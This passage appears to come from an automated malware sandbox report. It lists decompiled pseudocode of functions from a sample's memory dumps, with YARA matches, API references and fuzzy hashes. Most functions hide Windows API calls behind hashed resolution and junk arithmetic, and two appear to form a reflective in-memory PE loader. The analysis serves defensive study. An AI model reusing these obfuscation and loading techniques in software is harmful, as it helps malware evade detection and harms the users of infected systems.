                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0022602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x0022c6e1
                                              0x0022c6e6
                                              0x0022c6f0
                                              0x0022c6fc
                                              0x0022c703
                                              0x0022c706
                                              0x0022c70d
                                              0x0022c711
                                              0x0022c715
                                              0x0022c71c
                                              0x0022c723
                                              0x0022c72a
                                              0x0022c731
                                              0x0022c738
                                              0x0022c751
                                              0x0022c762
                                              0x0022c768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00221000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x00221006
                                              0x00221009
                                              0x0022100c
                                              0x00221011
                                              0x00221016
                                              0x0022101d
                                              0x00221026
                                              0x0022102d
                                              0x00221034
                                              0x0022103b
                                              0x00221047
                                              0x0022104f
                                              0x00221057
                                              0x0022105e
                                              0x00221065
                                              0x0022106c
                                              0x00221073
                                              0x00221077
                                              0x0022108b
                                              0x00221096
                                              0x0022109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00224859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00224859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x0022485e
                                              0x0022487a
                                              0x0022487d
                                              0x00224884
                                              0x0022488b
                                              0x00224892
                                              0x0022489d
                                              0x002248a0
                                              0x002248ad
                                              0x002248b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 002248B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}











                                              0x10001783
                                              0x10001787
                                              0x1000178c
                                              0x10001797
                                              0x100017a0
                                              0x100017f9
                                              0x10001806
                                              0x10001808
                                              0x10001808
                                              0x10001815
                                              0x1000181d
                                              0x10001824
                                              0x100017a2
                                              0x100017a2
                                              0x100017a7
                                              0x100017ad
                                              0x100017c6
                                              0x100017cd
                                              0x100017af
                                              0x100017af
                                              0x100017b2
                                              0x100017ba
                                              0x00000000
                                              0x00000000
                                              0x100017ba
                                              0x100017ad
                                              0x100017db
                                              0x100017db
                                              0x1000178e
                                              0x10001793
                                              0x10001793

                                              APIs
                                              • VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                              • Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
                                              • Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                              • Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00234F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E00234F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x00234f80
                                              0x00234f81
                                              0x00234f82
                                              0x00234f86
                                              0x00234f87
                                              0x00234f8c
                                              0x00234fa5
                                              0x00234fa8
                                              0x00234faf
                                              0x00234fb6
                                              0x00234fc7
                                              0x00234fca
                                              0x00234fd7
                                              0x00234fe2
                                              0x00234fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}
























                                              0x10001626
                                              0x1000162a
                                              0x1000162e
                                              0x10001631
                                              0x10001637
                                              0x1000163a
                                              0x10001645
                                              0x1000170a
                                              0x10001713
                                              0x1000164b
                                              0x1000164b
                                              0x10001651
                                              0x10001654
                                              0x10001656
                                              0x10001656
                                              0x1000165a
                                              0x100016ab
                                              0x10001718
                                              0x00000000
                                              0x100016ad
                                              0x100016bb
                                              0x100016bf
                                              0x00000000
                                              0x100016c1
                                              0x100016c4
                                              0x100016c6
                                              0x100016cb
                                              0x100016d0
                                              0x100016d2
                                              0x100016d4
                                              0x100016d6
                                              0x100016d9
                                              0x100016db
                                              0x100016de
                                              0x100016de
                                              0x100016d6
                                              0x100016e1
                                              0x00000000
                                              0x100016e1
                                              0x100016bf
                                              0x1000165c
                                              0x1000165f
                                              0x10001664
                                              0x00000000
                                              0x1000166a
                                              0x1000166d
                                              0x1000166f
                                              0x10001674
                                              0x10001677
                                              0x1000167c
                                              0x10001720
                                              0x10001726
                                              0x10001682
                                              0x10001685
                                              0x10001688
                                              0x1000168d
                                              0x1000168f
                                              0x10001693
                                              0x1000169f
                                              0x1000169f
                                              0x1000169f
                                              0x100016e4
                                              0x100016e4
                                              0x100016e7
                                              0x00000000
                                              0x100016e7
                                              0x1000167c
                                              0x10001664
                                              0x00000000
                                              0x100016ed
                                              0x100016f5
                                              0x100016fa
                                              0x100016fd
                                              0x10001700
                                              0x00000000
                                              0x10001656
                                              0x00000000

                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
                                              • SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocErrorLastVirtual
                                              • String ID:
                                              • API String ID: 497505419-0
                                              • Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                              • Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
                                              • Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                              • Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x00239772
                                              0x00239773
                                              0x00239778
                                              0x0023977a
                                              0x0023977b
                                              0x0023977e
                                              0x0023977f
                                              0x00239782
                                              0x00239785
                                              0x00239788
                                              0x00239789
                                              0x0023978c
                                              0x0023978f
                                              0x00239790
                                              0x00239791
                                              0x00239794
                                              0x00239797
                                              0x0023979a
                                              0x0023979d
                                              0x002397a0
                                              0x002397a3
                                              0x002397a6
                                              0x002397a7
                                              0x002397a8
                                              0x002397ad
                                              0x002397b7
                                              0x002397c3
                                              0x002397ca
                                              0x002397d1
                                              0x002397d8
                                              0x002397df
                                              0x002397e3
                                              0x002397fc
                                              0x00239816
                                              0x0023981d

                                              APIs
                                              • CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0022602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x0022b569
                                              0x0022b56a
                                              0x0022b56d
                                              0x0022b572
                                              0x0022b574
                                              0x0022b577
                                              0x0022b57a
                                              0x0022b57d
                                              0x0022b580
                                              0x0022b583
                                              0x0022b586
                                              0x0022b587
                                              0x0022b58a
                                              0x0022b58d
                                              0x0022b590
                                              0x0022b593
                                              0x0022b594
                                              0x0022b595
                                              0x0022b59a
                                              0x0022b5a4
                                              0x0022b5b8
                                              0x0022b5c0
                                              0x0022b5c4
                                              0x0022b5cb
                                              0x0022b5d2
                                              0x0022b5d9
                                              0x0022b5e6
                                              0x0022b5fd
                                              0x0022b604

                                              APIs
                                              • CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x00239821
                                              0x00239822
                                              0x00239825
                                              0x00239828
                                              0x0023982a
                                              0x0023982c
                                              0x0023982f
                                              0x00239832
                                              0x00239835
                                              0x00239836
                                              0x00239837
                                              0x0023983c
                                              0x00239855
                                              0x00239858
                                              0x0023985f
                                              0x00239866
                                              0x0023986d
                                              0x00239874
                                              0x0023987b
                                              0x0023988e
                                              0x0023989b
                                              0x002398a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00237BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x00237bf7
                                              0x00237bf8
                                              0x00237bfa
                                              0x00237bfd
                                              0x00237bff
                                              0x00237c02
                                              0x00237c06
                                              0x00237c07
                                              0x00237c0f
                                              0x00237c1d
                                              0x00237c25
                                              0x00237c2d
                                              0x00237c31
                                              0x00237c38
                                              0x00237c3f
                                              0x00237c46
                                              0x00237c4a
                                              0x00237c5e
                                              0x00237c67
                                              0x00237c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
